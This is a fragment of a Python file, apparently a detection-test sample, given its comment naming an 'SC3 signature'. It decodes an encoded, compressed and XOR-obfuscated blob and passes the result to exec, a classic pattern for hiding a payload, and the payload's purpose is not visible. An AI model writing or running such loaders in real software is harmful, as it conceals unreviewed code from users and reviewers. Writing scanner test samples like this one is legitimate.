g3vsblS/Y/WQXzIUpy3/XlQ4BuLmcMJQvBTTIsPv4pL+5jELu0bTf/n9VytzjYR/1fp9T8V3I79rblWbESYE3rqv1AyEPitD0Unc5yow+PnriKiLVomJ+qWCp+Ic/uVdbl/cqasJ//MvUtRyJg=="
_K = bytes.fromhex("3d4343a7ef4847d968523d61")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
